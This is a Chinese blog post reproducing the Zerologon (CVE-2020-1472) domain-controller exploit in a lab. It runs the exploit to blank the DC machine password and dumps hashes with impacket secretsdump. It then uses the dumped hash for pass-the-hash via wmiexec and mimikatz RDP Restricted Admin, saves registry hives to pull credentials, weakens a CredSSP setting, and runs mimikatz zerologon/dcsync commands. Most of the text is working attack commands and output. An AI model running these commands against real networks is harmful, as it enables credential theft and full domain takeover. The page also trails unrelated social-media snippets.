CVE-2020-1472域内提权漏洞利用
首页 发布

简介


2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。


漏洞原理


Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,可以向域发起Netlogon 计算机账户认证请求, 使用8字节全0 client challenge 不断尝试得到一个正确的8字节全0 client credential 通过认证,再通过相关调用完成对域控密码的修改。


影响版本


Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)


利用过程


复现环境


目标靶机:


域控:Winserver2012 R2(x64)
IP:10.211.55.12
hostname:sever2012
域:tide.rog



攻击机:mac os


使用的工具:

1、CVE-2020-1472 攻击exp

2、impacket网络协议工具包


运行exp


首先运行exp脚本,将AD域控的机器账户server2012的密码置换成空:

命令查看域控计算机主机名和ip

net group "Domain Controllers" /domainping server2012.tide.org

-n指定域控计算机主机名

-t指定域控ip

运行exp,确定把域控机器账户密码置换成空

注意:置空密码可能会导致脱域,谨慎使用。

获取hash


置空密码后接下来我们利用impacket网络协议工具包的secretsdump.py脚本根据DRS协议来获取相关的HASH信息。

~impacket/examples/python3 secretsdump.py tide/server2012\$@10.211.55.12 -no-pass


server2012的hash为31d6cfe0d16ae931b73c59d7e0c089c0,也就是空密码。

还得到的域管administrator账户的hash为6ec77abf4e1d5e5027db29d144bd8673。


获取到hash之后,可以尝试进行解密,如果解密成功可以直接连接3389获得域控权限。

如果密码复杂度高会解密失败,可以使用hash横向的工具执行系统cmd命令。

常用的工具有:wmiexec,psexec,atexec,smbexec等


wmiexec执行命令


使用wmiexec执行cmd,输入域控管理员对应hash,主机ip

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:6ec77abf4e1d5e5027db29d144bd8673 Administrator@10.211.55.12



mimikatz登陆rdp


抓取hash无法破解的情况下,可以尝试使用hash登陆远程桌面,需要开启"Restricted Admin Mode",在Windows8.1和Windows Server 2012R2上默认开启。

有两种开启方法第一种为打补丁,第二种为手动修改注册表。

修改注册表开启:

查看是否开启:

回显DisableRestrictedAdmin REG_DWORD 0x0 为开启

REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"


使用支持restrictedadmin登录的攻击主机

mstsc.exe /restrictedadmin

如下为不支持restrictedadmin登录

弹出远程连接表示支持restrictedadmin登录

管理员运行mimikatz,执行命令

/user为登录的用户名 /domian为目标地址 /ntml为账户ntml值

privilege::debugsekurlsa::pth /user:administrator /domain:10.211.55.12 /ntlm:6ec77abf4e1d5e5027db29d144bd8673 "/run:mstsc.exe /restrictedadmin"

更改计算机地址为目标地址,点击连接。

登录成功。


坑点


1、ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations 请检查mimiket及对应操作系统版本


2、 error kuh1_m_sekurlsa_acquireLSA:logon list 请下载最新版mimiketz


3、遇到CredSSP加密数据库错误是大概是因为win10家庭版,一条命令直接解决。

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters /v AllowEncryptionOracle /t REG_DWORD /d 2 /f


还原机器账户hash


如果机器账户hash长时间为空,可能会导致脱域,对内网的使用产生重大影响,因此拿到权限的第一时间需要把hash重置回去。


首先获取原hash,在cmd中执行。


reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save


会在目标c盘根目录生成sam.save、system.save、security.save文件,然后下载到本地。

在mac上执行,没有下载文件到本地,原因未知。

可以使用其它操作系统执行,也可以使用powershell命令先上线到cs服务器,然后下载。


下载文件到本地后,执行如下命令,利用secretsdump.py解析保存在本地的ntml hash

~impacket/examplespython3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL


箭头指向的位置即为之前使用的hash


9774cb9c026d03f8157bfdf6a9352342


使用reinstall_original_pw.py对hash进行恢复

python3 reinstall_original_pw.py server2012 10.211.55.12 9774cb9c026d03f8157bfdf6a9352342


使用空密码再次尝试查看目标hash信息,失败,说明目标hash已成功还原。

python3 secretsdump.py tide/server2012\$@10.211.55.12 -no-pass


mimikatz 利用


mimikatz 20200918后版本支持通过zerologon漏洞攻击域控服务器。


1、运行poc查看是否存在漏洞

lsadump::zerologon /target:10.211.55.12 /account:server2012$

2、运行exp把域控主机hash置为空

lsadump::zerologon /target:10.211.55.12 /account:server2012$ /exploit

3、查看指定用户的hash

lsadump::dcsync /domain:tide.org /dc:Server2012.tide.org /user:administrator /authuser:server2012$ /authdomain:tide /authpassword:"" /authntlm


4、防止域环境出现问题,恢复密码

lsadump::postzerologon /target:10.211.55.12 /account:server2012$

我知道你在看



发布     👍 0 举报 写留言 🖊   
✋热门推荐
  • 其实用事实说话,但凡你跟白羊座接触久了,并且跟他们有深入的交心,你都不难发现,亲近之后他们的行为举止,根本不像是以前刚认识的那样单纯,这时候的他们,随口一句都会
  • #每日一善[超话]#[太阳]#阳光信用# 柳子厚墓志铭 韩愈〔唐代〕  子厚,讳宗元。七世祖庆,为拓跋魏侍中,封济阴公。曾伯祖奭,为唐宰相,与褚遂良、韩瑗俱得
  • #每日一善[超话]#[太阳]#阳光信用# 柳子厚墓志铭 韩愈〔唐代〕  子厚,讳宗元。七世祖庆,为拓跋魏侍中,封济阴公。曾伯祖奭,为唐宰相,与褚遂良、韩瑗俱得
  • 有时候不得不感叹一下金钱的魔力,在我的安排下,短短一天的时间,“如约”影楼的负面影响就达到了最高峰,全网都知道了他们的缺德行为,强烈地谴责。有时候不得不感叹一下
  • 好比最近一两个月新上来的B来说, jto ace nfp ai xai manta alt jup zeta 等,其实稍微做个过滤都会知道,其中好多都是某某生态
  • ” 她回答道:“我不知道为什么江初瑶对我有那么大的敌意,我一开始明明想和她交好,但是她一点面子不给,反而还三番两次终止了跟我的合作,我也不知道是哪里得罪过她,海
  • 对此,极兔速递的抖音官方账号“兔兔快递员”澄清表示:“信息发布者并非企业官方账号,不代表公司立场,公司会继续努力,致力于为客户提供更好的服务。对此,极兔速递的抖
  • #第二十条##赵丽颖第二十条# 前面很搞笑,后面差点哭死我,妆都哭没了[苦涩]很喜欢电影里面的一段话(记不太清了但大致意思是这样的):“法律是为群众谋求公平的
  • - ——沈从文《湘行书简》 14.你的心依旧年轻,随时准备狂跳不已,只是我不是能让你的心狂跳的人,我不是你的心坎,尽管我做梦都想是。 ——冯唐
  • 天鹅在排湖落了户,美丽的故事传千古……脍炙人口的皮影台词,引人入胜,饶有趣味。皮影戏匠人就像魔术师,只要一切准备就位,音乐声伴着朗朗上口的台词一同响起,小小皮影
  • 关于拉爵希望将老特拉福德打造成“北方的温布利”如果这是他的观点,那么我会说这表达了这家俱乐部的雄心壮志,这很好,但我在这家俱乐部的任务不是处理球场或是设施问题,
  • 昨晚一直持续的讨论,让大家更加深了对檀健次的印象,你们什么感觉我不知道,反正我超爽的!我担上春晚,已经很让我骄傲了,想过节目可能会比较晚,但是居然是压轴,压轴也
  • 趁父母还健康,多回家看看他们,陪他们多说说话……几年前我在杭州租房时,有天房东老太太突然对我说:我今年83岁了,从这个月起,你就不用再给我交房租了,只是有一件事
  • 小孕妇今天是开启休假模式的第一天,最近感觉好像时间回到了曾经还在读书的时候,提前放了假,在家陪爸妈准备年货,大扫除,晚上的时候一起围在火炉边上看看电视唠唠嗑,觉
  • 我的话唠小狗,我的笨蛋小狗,我的可爱小狗,我的小狗,我心爱的人,我最好的朋友,亲密的爱人,我要和你说数不完的爱你,让我慢慢说吧,好吗?你只是想我多爱你一点嘛,我
  • #刘宇宁宁远舟# | #刘宇宁一念关山# |#摩登兄弟[超话]# 刘宇宁宁远舟[给力]刘宇宁燕子京我见众生皆草木,唯有见你是青山。」✨@摩登兄弟刘宇宁刘宇宁一
  • 6.我会在微博坚持签到直到有心软的鱼神捞我[悲伤],不知道还有什么要补充的,可以告诉我,我补充上[开学季]李安谈婚姻和爱:“我觉得婚姻里头,再多的爱,都没有比尊
  • 自从中世纪海上大交通五百年以来,泰国铸造和发行的钱币上,保持着其形状稀奇古怪的特色。纯粹的、非非感性的表象,在一种与被表象者的具有中介作用的关系中展开出来的表象
  •  康大叔は、見下したような冷笑を浮かべて、「お前、俺の話がわかってねえな」「奴が言うのは、阿義がかわいそうだって、いうんだ」 聞いていた連中の目はきょとんと動か
  • 庄子说“莫若以明”当把万千杂念归结为一,当一个人懂得不断地去缮性,他的修行就会趋向于最终的光明。一切离心纵欲的念与行,都是伤害真常自在的恶,既已知恶,也就明晓了